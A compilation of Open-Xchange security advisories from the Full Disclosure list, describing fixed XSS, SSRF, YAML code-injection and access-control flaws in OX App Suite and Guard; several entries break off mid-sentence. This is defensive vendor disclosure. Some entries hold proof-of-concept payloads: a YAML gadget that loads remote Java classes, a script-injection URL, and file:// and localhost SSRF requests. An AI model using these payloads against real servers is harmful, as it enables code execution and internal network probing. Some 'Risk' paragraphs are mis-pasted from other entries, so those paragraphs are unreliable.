[FD] Open-Xchange Security Advisory 2021-11-19
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite Vendor: OX Software GmbH Internal reference: OXUIB-872 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev30, 7.10.4-rev27, 7.10.5-rev18 Vendor notification: 2021-06-01 Solution date: 2021-08-23 Public disclosure: 2021-11-19 CVE reference: CVE-2021-38374 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: The "app loader" mechanism of the frontend component could be abused to load content from relative URLs, outside of the intended code loading API path. This can be used by attackers to add references to malicious content that is served by the same domain. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. As attacker, upload a code snippet to drive and create a sharing link 2. Modify the "app loader" URL and include a relative reference to the shared code snippet 3. Embed a direct reference to this snippet at a malicious website or make a user follow the reference Solution: We now restrict relative references to only include the intended API path. --- Internal reference: MWB-1113 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21 Vendor notification: 2021-06-02 Solution date: 2021-08-23 Public disclosure: 2021-11-19 CVE reference: CVE-2021-38375 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: HTML E-Mails with lots of content are being truncated for improved performance. Their full content is being delivered when opening the HTML part at a dedicated browser tab. The mechanism that dealt with inline images allowed to inject script code as part of a HTML img "alt" tag. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail. Steps to reproduce: 1. Create a artifically large HTML E-Mail with script code at an images "alt" tag. 2. Deliver the mail and make the victim display the truncated part Proof of concept: Solution: We updated the detection and sanitization logic to deal with embedded script code fragments. --- Internal reference: MWB-1116 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21 Vendor notification: 2021-06-02 Solution date: 2021-08-23 Public disclosure: 2021-11-19 CVE reference: CVE-2021-38377 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: HTML E-Mails with lots of content are being truncated for improved performance. Their full content is being delivered when opening the HTML part at a dedicated browser tab. The mechanism that dealt with temporary internal transformation state allowed to inject script code by abusing a "anchor" HTML comment. The comments identifier is a predictable UUID and stores HTML transformation results, which is exempt from sanitization. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to open the non-truncated representation of an E-Mail. Steps to reproduce: 1. Create a artifically large HTML E-Mail with script code at an "anchor" comment 2. Deliver the mail and make the victim display the truncated part Proof of concept: Solution: We now use a random value for temporary anchors to avoid exploiting this internal state. --- Internal reference: MWB-1185 Vulnerability type: Information Disclosure (CWE-200) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21 Vendor notification: 2021-07-15
[FD] Open-Xchange Security Advisory 2021-11-18
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite, OX Documents Vendor: OX Software GmbH Internal reference: MWB-993 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-03-09 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33489 CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Specific image formats use media-types that are were not recognized by our sanitization engine. When injecting HTML and JS code to such files, they could bypass sanitization methods. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink. Steps to reproduce: 1. Create a XCF image file and include JS code 2. Share the file using OX Drive sharing 3. Make someone click the direct link to the shared file Solution: We improved the list of known unsafe media-types to make sure such content is handled as binary file and download is enforced. --- Internal reference: MWB-1067 Vulnerability type: Code Injection (CWE-94) Vulnerable version: 7.10.5 and earlier Vulnerable component: middleware Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-05-06 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33493 CVSS: 3.9 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N) Vulnerability Details: The middleware component uses YAML for complex configuration constructs. The parser used for that purpose offers an insecure parsing method, which could be abused to inject arbitrary YAML-formatted Java classes that would be executed. Risk: Arbitrary Java code could be executed in the context of the middleware process. To exploit this, a user with high privilege or a compromised workload would have to maliciously modify configuration files. These modifications are very likely to cause malfunction and keep the service from starting properly. Steps to reproduce: 1. Add YAML representation of Java classes to a configuration file 2. Reload configuration or restart Proof of concept: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://example.open-xchange.com/;] ]] ] Solution: We now use a parsing method that is limited to creating save Java classes which are expected for configuration files. --- Internal reference: MWB-1094 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.5 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13 Vendor notification: 2021-05-20 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33490 CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: HTML content stored as "snippet" does not get properly sanitized in case invalid HTML is stored. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would either have access to the victims account or be part of the same context. Steps to reproduce: 1. Create a snippet with broken HTML code and store it as (shared) mail signature 2. Make users to select the malicious mail signature Solution: We improved sanitization of snippets, including invalid HTML code. --- Internal reference: DOCS-3309 Vulnerability type: Relative Path Traversal (CWE-23) Vulnerable version: 7.10.5 and earlier Vulnerable component: office Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.3-rev15, 7.10.4-rev9, 7.10.5-rev6 Vendor notification: 2021-03-23 Solution date: 2021-06-01 Public disclosure: 2021-11-18 CVE reference: CVE-2021-33491 CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L) Vulnerability Details: External mail account discovery allows malicious users to append arbitrary URL paths to mail addresses. In combination with malicious auto-configuration DNS records, this can be abused to access web services outside of the expected trust boundary, regardless of existing blocklists. Risk: Zip archives (like OOXML and ODF documents) might contain entrie
[FD] Open-Xchange Security Advisory 2020-10-13
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX App Suite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite / OX Documents Vendor: OX Software GmbH Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.2, 7.10.3 Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.2-rev29, 7.10.3-rev15 Vendor notification: 2020-04-27 Solution date: 2020-07-01 Public disclosure: 2020-10-13 Researcher Credits: MOGWAI LABS GmbH CVE reference: CVE-2020-15004 CVSS: 2.2 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: A internal diagnostics servlet did return the content of a HTTP GET request as part of the generated website. This can be used to supply malicious JS code via a hyperlink. Access to the servlet is unauthenticated and not possible over a public network by default. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). Steps to reproduce: 1. Create a link to the diagnostics servlet containing script code 2. Make someone with access to this servlet click the link Proof of concept: http://example.com:8009/stats/diagnostic?param=%3Cscript%3Ealert(%27ayb%27);%3C/script%3E%22 Solution: We no longer return any supplied parameter as part of the HTML page. --- Internal reference: MWB-289 Vulnerability type: Information exposure (CWE-200) Vulnerable version: 7.10.2, 7.10.3 Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.2-rev29, 7.10.3-rev15 Vendor notification: 2020-05-08 Solution date: 2020-07-01 Public disclosure: 2020-10-13 CVE reference: CVE-2020-15003 CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: When accessing a public or restricted share as a guest, for example in Drive, users have the ability to query and terminate sessions of other guests. This exposes IP addresses, os and user agent information as well as session identifiers. Risk: Malicious guest users are able to terminate other users sessions. They can also look up other users IP addresses and client information. Steps to reproduce: 1. Create a shared Drive folder 2. Have several guests visit this share 3. As a guest, query the session API, check Settings -> Security Solution: We removed the ability for guests to access session information of other guests. --- Internal reference: MWB-348 Vulnerability type: Server-side request forgery (CWE-918) Vulnerable version: 7.10.3 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev72, 7.10.1-rev32, 7.10.2-rev29, 7.10.3-rev15 Vendor notification: 2020-06-03 Solution date: 2020-07-01 Public disclosure: 2020-10-13 CVE reference: CVE-2020-15002 CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Vulnerability Details: Messaging account URLs can be set and requested through API. These are not filtered through our blacklists and may contain local or internal network hosts. Risk: While this feature is not exposed through our user interface, knowledgable attackers can use the API to query internal resources through network requests and assess availability of systems and what services they run. This can be used as a reconnaissance step during an attack. Steps to reproduce: 1. Use the "/ajax/messaging/account" API to set up a new messaging account and provide an internal "url" 2. Use the "/ajax/messaging/message" message API to list new messages for this account. Based on the response time and error message it's possible to assess if a service is available or not. Solution: We extended existing blacklist checks to this feature. --- Internal reference: OXUIB-308 Vulnerability type: Cross-site scripting (CWE-80) Vulnerable version: 7.10.2 and 7.10.3 Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.2-rev26, 7.10.3-rev13 Vendor notification: 2020-06-10 Solution date: 2020-07-01 Public disclosure: 2020-10-13 Researcher Credits: Zeeshan Khalid CVE reference: CVE-2020-15004 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: Bootstrap attributes can be used to execute script code at appointment titles. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would either send a malicious calendar invite or be part of the same organization to invite the victi
[FD] Open-Xchange Security Advisory 2020-08-20
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX App Suite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite / OX Documents Vendor: OX Software GmbH Internal reference: MWB-70 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.3 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12 Vendor notification: 2020-02-07 Solution date: 2020-05-13 Public disclosure: 2020-08-20 Researcher Credits: raiz_ CVE reference: CVE-2020-12646 CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: Our script filters did not consider the ancient media-type "text/x-javascript" as potentially malicious, however Google Chrome executes content of this type as script code. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). To exploit this an additional step is necessary which could be achieved through social engineering. Steps to reproduce: 1. Upload a code snippet to Drive and modify its media-type 2. Share the file publicly and make a user open this link 3. Next, make the user visit a direct API reference to the file and add "delivery=view" as API parameter Solution: We improved our filter to consider this media-type. --- Internal reference: MWB-107 (Bug ID) Vulnerability type: Improper input validation (CWE-20) Vulnerable version: 7.10.1 to 7.10.3 Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12 Vendor notification: 2020-02-24 Solution date: 2020-05-13 Public disclosure: 2020-08-20 Researcher Credits: Osama Hamad Shehab CVE reference: CVE-2020-12645 CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: When using OX App Suite for authentication directly, a login "rate-limit" is applied. This could be circumvented by exploiting logic issues when handling the clients user-agent string. Risk: Brute-force attempts could be made using large quantities of arbitrary passwords to discover account credentials. While this attack would be quite noisy it's possible that it may not get noticed on unmonitored systems. The attacker would still hit the generic API request limit at some point. Steps to reproduce: 1. Use the /login API and send login attempts until the rate-limit hits 2. Modify the user-agent string 3. Return login attempts Solution: We fixed the logic dealing with buckets of login processes to discover such attempts and correctly apply rate limiting. --- Internal reference: MWB-108 (Bug ID) Vulnerability type: Access Control Bypass (CWE-639) Vulnerable version: 7.10.3 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12 Vendor notification: 2020-02-24 Solution date: 2020-05-13 Public disclosure: 2020-08-20 Researcher Credits: kattsson CVE reference: CVE-2020-12643 CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) Vulnerability Details: Incorrect permission checks were performed when requesting other users "snippets". This can be used to discover E-Mail addresses of external accounts. Risk: Potentially sensitive information about other users can be discovered and used for further attacks. Access is limited to users within the same context. Steps to reproduce: 1. Use the /api/subscriptions API and request arbitrary subscription IDs for other user IDs 2. If a combination of user ID and subscription ID matches, metadata about a subscription would be returned Solution: We improved permissions checks in this area to limit exposure of information. --- Internal reference: MWB-120 (Bug ID) Vulnerability type: Improper input validation (CWE-20) Vulnerable version: 7.10.3 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12 Vendor notification: 2020-02-27 Solution date: 2020-05-13 Public disclosure: 2020-08-20 Researcher Credits: kattsson CVE reference: CVE-2020-12645 CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N) Vulnerability Details: Vacation notices could be used to send E-Mail with arbitrary sender information. Risk: Malicious users could set up vacation notices that send E-Mail responses with a forged sender address. Depending on the egress MTA configuration this can be used for impersonification. Steps to reproduce: 1. Create vacatio
[FD] Open-Xchange Security Advisory 2020-06-12
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite / OX Documents Vendor: OX Software GmbH Internal reference: 68441, 68453, 68454 (Bug ID) Vulnerability type: Server-Side Request Forgery (CWE-918) Vulnerable version: 7.10.3 and earlier Vulnerable component: backend, office documentconverter Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev68, 7.10.1-rev28, 7.10.2-rev22, 7.10.3-rev7 Vendor notification: 2019-11-29 Solution date: 2020-03-06 Public disclosure: 2020-06-12 CVE reference: CVE-2019-18846, CVE-2020-8544 CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Vulnerability Details: Our blacklisting restrictions for various APIs have flaws that allow attackers to bypass certain checks by using "smart" endpoints. In detail, the check if a URL is blacklisted was triggered independently from accessing the actual resource. Malicious endpoints with knowledge about application state could abuse this to bypass blacklisted resources. The same vulnerability affects multiple components. Risk: Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services. Steps to reproduce: 1. Create a RSS feed 2. Specify a resource where the endpoint responds differently based on the request count 3. Return a valid result on the blacklist request but HTTP redirect when actually accessing the resource Solution: We improved the blacklisting check to make sure the actual resource is being checked when retrieving. --- Internal reference: 68478 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.3 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.8.4-rev62, 7.10.1-rev28, 7.10.2-rev20, 7.10.3-rev6 Vendor notification: 2019-12-02 Solution date: 2020-03-06 Public disclosure: 2020-06-12 CVE reference: CVE-2020-8542 CVSS: 2.2 CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N Vulnerability Details: Self-XSS was possible when pasting malicious HTML content to the mail signature editor. This could be used as part of a social engineering scheme. Risk: Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services. Steps to reproduce: 1. Ask a user to edit a mail signature and use the "Code" feature 2. Make the user paste malicious HTML Code, for example SVG with embedded JS 3. Example: "> sodales molestie velit Solution: We improved frontend sanitization of user-provided content. --- Internal reference: OXUIB-39 (Bug ID) Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 7.10.3 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.1-rev28, 7.10.2-rev20, 7.10.3-rev6 Vendor notification: 2020-01-27 Solution date: 2020-03-06 Public disclosure: 2020-06-12 Researcher Credits: zee_shan CVE reference: CVE-2020-8542 CVSS: 5.3 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Vulnerability Details: Script code within a HTML E-Mail was executed under certain circumstances, like agreeing to load external images. Risk: Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services. Steps to reproduce: 1. Create a malicious mail with external images 2. Make the user load external content within the mail 3. Example:
[FD] Open-Xchange Security Advisory 2020-06-12
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX Guard Vendor: OX Software GmbH Internal reference: GUARD-179 Vulnerability type: Cross-Site Scripting (CWE-80) Vulnerable version: 2.10.3 Vulnerable component: guard Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 2.10.2-rev9, 2.10.3-rev4 Vendor notification: 2020-02-04 Solution date: 2020-03-06 Public disclosure: 2020-06-12 CVE reference: CVE-2020-9426 CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: Comments within forged malicious public-keys could contain HTML and Javascript that was not properly sanitized before displaying at Guard settings. Through autocrypt and other mechanisms such keys could get imported without noticing their malicious content. Risk: Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services. Steps to reproduce: 1. Create a PGP keypair 2. Use HTML and JS as part of the public keys comment section 3. Distribute this key through mail attachments, autocrypt or HKP Solution: We improved our sanitizing and ensure that external content such as comments are handled safely. --- Internal reference: GUARD-182 Vulnerability type: Server-Side Request Forgery (CWE-918) Vulnerable version: 2.10.3 Vulnerable component: guard Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 2.10.2-rev9, 2.10.3-rev4 Vendor notification: 2020-02-11 Solution date: 2020-03-06 Public disclosure: 2020-06-12 CVE reference: CVE-2020-9427 CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Vulnerability Details: HKP/HKPS key discovery mechanisms are based on DNS service records. Those are probed to look up unknown public-keys but were insufficiently checked for sensitive resource locations. Risk: In case of a malicious DNS server or domain, an attacker could use this technique to redirect HTTP requests to internal networks. Taking timing and response codes into consideration this can be used to determine if a specific port at a internal system is open or not, leading to basic network discovery capabilities for the attacker. Steps to reproduce: 1. Setup a malicious domain with HKP/HKPS service records, point them to a malicious HKP responder 2. At the malicious HKP responder, issue HTTP redirects targetting internal hosts like 127.0.0.1 Solution: We now run HKP responses through existing blacklist mechanisms to avoid accessing internal network resources. --- Internal reference: GUARD-183 Vulnerability type: Server-Side Request Forgery (CWE-918) Vulnerable version: 2.10.3 Vulnerable component: guard Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 2.10.2-rev9, 2.10.3-rev4 Vendor notification: 2020-02-11 Solution date: 2020-03-06 Public disclosure: 2020-06-12 CVE reference: CVE-2020-9427 CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) Vulnerability Details: WKS/Webkey services discovery mechanisms are based on DNS service records. Those are probed to look up unknown public-keys but were insufficiently checked for sensitive resource locations. Risk: In case of a malicious DNS server or domain, an attacker could use this technique to redirect HTTP requests to internal networks. Taking timing and response codes into consideration this can be used to determine if a specific port at a internal system is open or not, leading to basic network discovery capabilities for the attacker. Mind that this attack gets mitigated when using DNSSEC, but depending on configuration this might get bypassed or not used. Steps to reproduce: 1. Setup a malicious domain with WKS/Webkey service records, point them to a malicious WKS responder 2. At the malicious WKS responder, issue HTTP redirects targetting internal hosts like 127.0.0.1 Solution: We now run WKS responses through existing blacklist mechanisms to avoid accessing internal network resources. signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open-Xchange Security Advisory 2020-02-19
Dear subscribers,
we're sharing our latest advisory with you and like to thank everyone who
contributed in finding and solving those vulnerabilities. Feel free to join our
bug bounty programs for OX AppSuite Dovecot and PowerDNS at HackerOne.
Yours sincerely,
Martin Heiland, Open-Xchange GmbH
Product: OX App Suite / OX Documents
Vendor: OX Software GmbH
Internal reference: 67871, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Vulnerability Details:
The attachment API for Calendar, Tasks etc. allows to define references to
E-Mail attachments that should be added. This reference was not checked against
a sufficient protocol and host blacklist.
Risk:
Users can trigger API calls that invoke local files or URLs. Content provided
by these resources would be added as attachment.
Steps to reproduce:
1. Create a task
2. Use the /ajax/attachment?action=attach API call and provide a URL
"datasource": {
"identifier": "com.openexchange.url.mail.attachment",
"url": "file:///var/file"
}
Solution:
We have implemented a protocol and host blacklist to avoid invoking any
file-system references and local addresses.
---
Internal reference: 67874 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)
Vulnerability Details:
The RSS feature allows to add arbitrary data sources. To avoid exposing
confidential data we implemented a host blacklist and protocol whitelist. Due
to an error the host blacklist was not checked in case the protocol passed the
whitelist.
Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a
different error will be returned compared to unavailable hosts. This can be
used to discover an internal network topology and services.
Steps to reproduce:
1. Create a RSS feed
2. Use http://127.0.0.1.nip.io:80/test.xml as RSS feed
3. Monitor the response code
Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts
regardless of the port evaluation. Please consider adjusting
com.openexchange.messaging.rss.feed.blacklist to you network layout.
---
Internal reference: 67931, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-04
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)
Vulnerability Details:
The snippets API allows to add arbitrary data sources. This reference was not
checked against a sufficient protocol and host blacklist.
Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a
different error will be returned compared to unavailable hosts. This can be
used to discover an internal network topology, services and files.
Steps to reproduce:
1. Create a snippet with HTML content
2. Include a reference to an internal host/service
http://localhost:22/badboy;>
3. Monitor the response code
Solution:
We implemented a protocol and host blacklist to avoid invoking any file-system
references and local addresses.
---
Internal reference: 67980 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)
Vulnerability Details:
The mail accounts feature allows to add arbitrary data sources. To avoid
exposing confidential data we implemented a host blacklist and protocol
whitelist. Due to an error the host blacklist was not checked in case the
protocol passed the whitelist.
Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a
different error will be returned compared to unavailable hos
[FD] Open-Xchange Security Advisory 2020-01-02
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs (open-xchange, appsuite, dovecot, powerdns) at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange GmbH Product: OX App Suite Vendor: OX Software GmbH Internal reference: 67097 (Bug ID) Vulnerability type: Cross-site scripting (CWE-80) Vulnerable version: 7.10.2 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.2-rev14, 7.10.1-rev22, 7.8.4-rev64 Vendor notification: 2019-09-20 Solution date: 2019-10-18 Public disclosure: 2020-01-02 CVE reference: CVE-2019-16717 CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: PNG files can be altered to contain comments, whicht might be script code. When sending such a PNG file as E-Mail and modifying the multipart content information, it's possible to inject script code in case the recipient gets tricked in using a specific URL. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). To exploit this an additional step is necessary which could be achieved through social engineering. Steps to reproduce: 1. Create a PNG file with JS code as comment 2. Create a mail with that file as inline image 3. Modify the images multipart information (filename to "something.html", content-type to "image/svg") 4. Send the mail to the victim 5. Make the victim click a hyperlink that requests the multipart image from the specific mail (would require guessing/evaluating the mail ID) Solution: We dismiss modifications to filename and content-type when returning multipart content of mails as download. --- Internal reference: 66594 (Bug ID) Vulnerability type: Cross-site scripting (CWE-80) Vulnerable version: 7.10.2 and earlier Vulnerable component: frontend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 7.10.2-rev13, 7.10.1-rev21, 7.8.4-rev58 Vendor notification: 2019-08-16 Solution date: 2019-10-18 Public disclosure: 2020-01-02 CVE reference: CVE-2019-16717 CVSS: 2.2 (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N) Vulnerability Details: When editing a mail signatures "Source", pasting malformed script code would bypass local sanitization. Risk: Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). To exploit this an additional step is necessary which could be achieved through social engineering. Steps to reproduce: 1. Edit a HTML E-Mail signature 2. Paste a double-tagged piece of script code Proof of concept: Solution: We now use DOMPurify at this location as well. --- Internal reference: 66538 (Bug ID) Vulnerability type: Improper access control (CWE-284) Vulnerable version: 7.10.2 and earlier Vulnerable component: backend Report confidence: Confirmed Solution status: Fixed by Vendor Fixed version: 